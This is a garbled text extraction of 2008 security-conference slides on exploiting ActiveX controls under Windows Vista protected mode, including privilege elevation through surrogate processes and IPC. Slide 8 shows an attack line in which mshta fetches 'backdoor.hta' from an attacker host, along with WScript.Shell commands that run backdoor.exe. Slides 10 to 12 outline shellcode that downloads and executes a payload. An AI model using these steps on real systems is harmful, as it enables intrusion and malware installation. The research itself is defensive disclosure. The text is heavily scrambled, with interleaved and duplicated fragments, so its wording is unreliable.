Embed Size (px)
Citation preview
The Atta
2008. 8.
Su Yong KimSu Yong Kimached Institute of ETRI
Outline of thisOutline of this
IntroductionIntroductionDifferences of VulnerPrivilege Elevation of
Explicit Privilege ElevImplicit Privilege ElevImplicit Privilege Elev
DemoConclusion
2
TalkTalk
rabilities on Vistaf ActiveX Control
vationvationvation
2
A ti X C tActiveX Contro
In most cases, ActiveXd i i t t i iladministrator privilegeThe same privilege withp g
ActiveX control can do
l XPol on XP
X controls have
h Internet Explorerp
o everything
3
A ti X C tActiveX Contro
Under protected mode, have user privilege withhave user privilege with
Writing a file/registry key with low integrity
Writing a file/registry key with medium integ
Executing a process with low integrity
Executing a process with medium integrity
Reading a file/registry key
l Vi tol on Vista
ActiveX controls low integrity low integrity
XP VistaXP Vista
N/A Possible
grity and above Possible Impossible
N/A possible
User and above Possible agreement
required
4
Possible Possible
Differences of Vue e ces o VuUnder Protected
File/Registry writing vulnermore difficult, but still critica,
Process execution vulneraOld has gone, but new has
Buffer overflow vulnerabilitShellcodes on XP do not w
File/Registry reading vulneNo differences
ulnerabilities u e ab t esMode
rabilityal
abilityys come
tywork
erability
5
File Writing Vulne W t g Vuon Vista
In principleCannot be misused to create aSt t f ldStartup folder○ Medium Integrity is required
In realityIn realityDevelopers have the same proSome developers install Activef ldfolders○ To update ActiveX control silenHence, dll files in low integrityHence, dll files in low integrity malicious users
In conclusionUser-privileged process ca
nerability e ab ty
a malicious program in the
oblems as malicious userseX control in low integrity
ntlyfolders can be overwritten byfolders can be overwritten by
an be run at low integrity
6
Process Executioocess ecut oon Vista (1/2)
If developers usedCreateProcess()CreateProcess()○ It runs a process at mediu○ However user agreement○ However, user agreementCreateProcessAsUser()
It can r n a process at lo○ It can run a process at low○ It can be exploited silently
○ User agreement is not requi○ User agreement is not requi
In ConclusionIn ConclusionUser-privileged process can
on Vulnerabilityo Vu e ab ty
um integrity or abovet is requiredt is required
integritw integrityyiredired
n be run at low integrity
7
Process Executioocess ecut oon Vista (2/2)
mshta.exe is usually uand execute a maliciouand execute a maliciou
mshta http://attacker.weBefore an unsigned baexecuted, Vista require, q
Set shell = CreateObjecshell Run "backdoor exshell.Run backdoor.ex
Signed program can g p gshell.Run "cmd.exe /c
8
on Vulnerabilityo Vu e ab ty
sed to download us programus programeb.server/backdoor.htaackdoor.exe is es user agreementgct("WScript.Shell")e“ebe used
c backdoor.exe"
Buffer Overflowon Vista
Everything is the sameAddress space layout rprevent heap spraying
However, shellcodes o
w Vulnerabilityy
e on XPandomization doesn’t method from working
on XP do not work
9
Sh ll d XPShellcode on XP
Find the address of kernel32.Find the addresses of some Akernel32.dll
LoadLibraryA, CreateFileA, WCreateProcessA ExitProcessCreateProcessA, ExitProcess
Call LoadLibraryA for wininetFind the addresses of some A
InternetOpenA, InternetOpenUCall InternetOpenA & InterneCall CreateFileA & InternetReCloseHandleCall CreateProcessA & E itPCall CreateProcessA & ExitP
10
PP
.dllAPI functions in
riteFile, CloseHandle,
.dllAPI functions in wininet.dllUrlA, InternetReadFiletOpenUrlAeadFile &WriteFile &
rocessrocess
0
P bl ViProblems on ViFind the address of kernel32.dllFind the addresses of some API fun
LoadLibraryA CreateFileA WriteFileLoadLibraryA, CreateFileA, WriteFileExitProcess
Call LoadLibraryA for wininet.dllFind the addresses of some API funFind the addresses of some API fun
InternetOpenA, InternetOpenUrlA, InCall InternetOpenA & InternetOpenUCall CreateFileA & InternetReadFile
Internet Explorer : Low IntegrityTarget folder : Medium Integrityg g y
Call CreateProcessA & ExitProcessCreateProcessA creates a process aPrivilege escalation requires user agPrivilege escalation requires user ag
11
i tista
ctions in kernel32.dlle CloseHandle CreateProcessAe, CloseHandle, CreateProcessA,
ctions in wininet dllctions in wininet.dllnternetReadFileUrlA
& WriteFile & CloseHandle
at medium integritygreementgreement
1
Sh ll d VShellcode on VFind the address of kernel32.dllFind the addresses of some API fun
LoadLibraryA CreateFileA WriteFileLoadLibraryA, CreateFileA, WriteFileGetTempPathA
Call LoadLibraryA for wininet.dllFind the addresses of some API funFind the addresses of some API fun
InternetOpenA, InternetOpenUrlA, InCall InternetOpenA & InternetOpenUCall GetTempPathA
Internet Explorer’s environment variaModeGetTempPathA returns %Temp%\Low
Call CreateFileA & InternetReadFileCall LoadLibraryA for advapi32.dlly pFind the addresses of CreateProcesCall CreateProcessAsUserA & ExitP
12
i tista
ctions in kernel32.dlle CloseHandle ExitProcesse, CloseHandle, ExitProcess,
ctions in wininet dllctions in wininet.dllnternetReadFileUrlA
ables are modified under Protected
w& WriteFile & CloseHandle
ssAsUserA in advapi32.dllProcess
2
User-Privileged Use v egedwith Low Integrit
Can steal most files/reCannot be executed a
Medium integrity is requMedium integrity is requCan be restarted by ovor sensitive data with l
DLL files may be loadedDLL files may be loadedprivileged process
Backdoor ac dooty
egistry informationgain at boot timeuireduiredverwriting DLL files ow integrityd by a higher-d by a higher
13
ActiveX Control ct ve Co t oPrivilege Elevatio
Explicit privilege elevaUser agreement is requ
Implicit (Silent) privilegUser agreement is not r
with w tontion
uired
ge elevationrequired
14
Explicit Privilegep c t v egeActiveX control
User agreement is reqHow to elevate privileg
Elevating privilege of AcElevating privilege of Ac○ CoCreateInstanceAsAd
HKLM\Soft are\Classes\HKLM\Software\Classes\abled = 1
Using a higher privilegeUsing a higher-privilege○ CreateProcess○ ShellExecute
e Elevation of e evat o o
quiredge?ctiveX controlctiveX controlminCLSID\{CLSID}\Ele ation\EnCLSID\{CLSID}\Elevation\En
ed surrogate processed surrogate process
15
Implicit Privilegep c t v egeActiveX control (
SurrogateSurrogate AASurrogateSurrogateprocessprocess
AccessAccess
OrderOrder
ActiveX controlActiveX control
OrderOrder
e Elevation of e evat o o(1/2)
Medium integrityMedium integrityor aboveor above
Local Local resourceresource
Low integrityLow integrityg yg y
16
Implicit Privilegep c t v egeActiveX control (
User agreement is NOWhy do developers waelevation?elevation?
Because frequent consusersusers
How to elevate privilegp gUsing elevation policyU i id t hi hUsing a resident higherprocess○ IPC, message, file and e
e Elevation of e evat o o(2/2)
OT requiredant silent privilege
ent pop-ups annoys
ge?g
i il d tr-privileged surrogate
etc17
U i El tiUsing Elevation
If a developer creates aActiveX control can runActiveX control can run medium integrity silently
HKEY_LOCAL_MACHINft\Internet Explorer\Low Rp○ AppName , AppPath, CL○ Policy = 3○ Policy 3
ActiveX ControlCreatePro(low integrity) CreatePro
P lin Policy
special registry key, the process atthe process at
yNE\SOFTWARE\MicrosoRights\Elevation Policyg yLSID
Higher-Privileged Processocess Process
(medium integrity)ocess
18
Using a ResidentUs g a es de tprivileged Surrog
The developer can inst hsurrogate process whe
installedHigher-privileged procexecuted at boot timeexecuted at boot timeActiveX control can ordc e co o ca o dprocess to perform a h
t Higher-t g egate Processstall a higher-privileged
A ti X t l ien ActiveX control is
ess will always be
der the higher-privileged de e g e p egedhigh-privileged job
19
Ordering a HigheO de g a g eSurrogate Proces
Sharing files and regisi t itintegrity
ActiveX Control(low integrity)
File/Re(low int
Update information file
write
Update information fileDLL file
er-privileged e p v egedss (1/3)stry keys with lower
egistryegrity)
Higher-Privileged Process(medium integrity and above)
read
20
Ordering a HigheO de g a g eSurrogate Proces
Windows MessageActiveX Control(low integrity) Send Me
Higher-privileged surrog○ ChangeWindowMessag
MSGFLT_ADD)ActiveX control○ SendMessage( WM CO○ SendMessage(,WM_CO
er-privileged e p v egedss (2/3)
essageHigher-Privileged Process(medium integrity and above)
gate processgeFilter(WM_COPYDATA,
OPYDATA [Message])OPYDATA, [Message])
21
Ordering a HigheO de g a g eSurrogate Proces
IPC(Inter-process Com
ActiveX Control(low integrity) IPC
Pipes
(low integrity)
PipesMailSlotsFile MappingRPCNetwork Communicatio
er-privileged e p v egedss (3/3)mmunication)
C Higher-Privileged Process(medium integrity and above)(medium integrity and above)
on, etc.
22
IPC E l (IPC Examples (
PipesSurrogate process○ ConvertStringSecurityDescript○ CreateNamedPipe("\\\\.\\pipe\\sActiveX controlActiveX control○ CreateFile("\\\\.\\pipe\\shared”,○ WriteFile()
SMailSlotsSurrogate process○ ConvertStringSecurityDescript○ ConvertStringSecurityDescript○ CreateMailSlot("\\\\.\\mailslot\\sActiveX control○ CreateFile("\\\\.\\mailslot\\share○ WriteFile()
(1/3)(1/3)
torToSecurityDescriptor(”S:(ML;;NW;;;LW)”,)shared”, [Security Descriptor])
)
torToSecurityDescriptor(”S:(ML;;NW;;;LW)” )torToSecurityDescriptor( S:(ML;;NW;;;LW) ,)shared”, [Security Descriptor])
ed”,)
23
IPC E l (IPC Examples (
File Mapping (Surrogate procSurrogate process○ ConvertStringSecurityDescript○ CreateFileMapping(, [Security ActiveX controlActiveX control○ OpenFileMapping(, “shared na○ MapViewOfFile() // write
(File Mapping (ActiveX controActiveX control○ CreateFileMapping( “shared n○ CreateFileMapping(, shared n○ MapViewOfFile() // writeSurrogate process○ OpenFileMapping(, “shared na○ MapViewOfFile() // read
(2/3)(2/3)
cess first)
torToSecurityDescriptor(”S:(ML;;NW;;;LW)”,)Descriptor], “shared name”)
ame”)
f )l first)
name”)name )
ame”)
24
IPC E l (IPC Examples (
RPC (with TCP)Surrogate process○ RpcServerUseProtseqEp ("ncaActiveX control○ RpcStringBindingCompose( "n○ RpcStringBindingCompose(, n○ CALL
RPC (with PIPE)Surrogate process○ ConvertStringSecurityDescript○ RpcServerUseProtseqEp ("nca○ RpcServerUseProtseqEp ( nca
Descriptor])ActiveX control
R St i Bi di C ( "○ RpcStringBindingCompose(, "n○ CALL
(3/3)(3/3)
acn_ip_tcp“, [Port #], NULL)
ncacn ip tcp“ [Port #] )ncacn_ip_tcp , [Port #],)
torToSecurityDescriptor(”S:(ML;;NW;;;LW)”,)acn np“ "\\\\ \\pipe\\shared" [Securityacn_np , \\\\.\\pipe\\shared , [Security
“ "\\\\ \\ i \\ h d" )ncacn_np“, "\\\\.\\pipe\\shared",)
25
DDemo
Detecting a process toi t itintegrity
o load dll files with low
26
P ti l S l tiPartial Solution
Do not install any progi t it f ldintegrity folderDo not store any sensDo not store any sensintegrity folderObtain user agreemenprivilegep ege
Security model on Vista
n
gram files in low
itive data in lowitive data in low
nt to elevate
a
27
C l iConclusion
ActiveX controls on Visl bilitisame vulnerabilities as
Developers' main concepfunctionality
sta have nearly the th XPs those on XP
ern is not security but y
28
R f (1/2Reference (1/2
Su Yong Kim, Do Hoon Lee, Sung Deocontrols”, CanSecWest 2007, http://ca
ki d h l isuyongkim-dohoonlee.zipMarc Silbey, Peter Brundrett, "UnderstMode Internet Explorer", MSDN, Sep. p , , pMicrosoft Corporation, "Developer BesApplications in a Least Privileged EnvSh C h R b F "A i XSharon Cohen, Rob Franco, "ActiveX Practices", MSDN, Sep. 2006Microsoft Corporation, “Interprocess CMicrosoft Corporation, Interprocess Chttp://msdn2.microsoft.com/en-us/liblaChris Corio, “Teach Your Apps To PlayA t C t l” MSDN htt // d 2Account Control”, MSDN, http://msdn2us/magazine/cc163486.aspx, Jan. 200
))
ok Cha, “Playing with ActiveX ansecwest.com/csw07/csw07-
tanding and Working in Protected 2006
st Practices and Guidelines for vironment", Sep. 2005
S i I d BSecurity: Improvements and Best
Communications", MSDN,Communications , MSDN, ary/aa365574.aspxy Nicely With Windows Vista User 2 i ft /2.microsoft.com/en-07
29
R f (2/2Reference (2/2
Michael Dunn, “A Developer’s Survivahttp://www.codeproject.com/KB/vista-sM 2007May. 2007Microsoft Corporation, “Designing AppLevel", MSDN, http://msdn2.microsoft, , pMicrosoft Corporation, “CreateProcesshttp://msdn.microsoft.com/en-us/librarMi f C i “I d iMicrosoft Corporation, “Introduction toMSDN, http://msdn.microsoft.com/en-Microsoft Corporation, “Appendix A: SMicrosoft Corporation, Appendix A: SMSDN, http://msdn.microsoft.com/en-
))
al Guide to IE Protected Mode”, security/PMSurvivalGuide.aspx,
plications to Run at a Low Integrity .com/en-us/liblary/bb625960.aspxy psAsUser Function”, MSDN, ry/ms682429(VS.85).aspx
h P d M d API”o the Protected Mode API”, us/library/ms537319.aspx
SDDL for Mandatory Labels”,SDDL for Mandatory Labels , us/library/bb625958.aspx
30
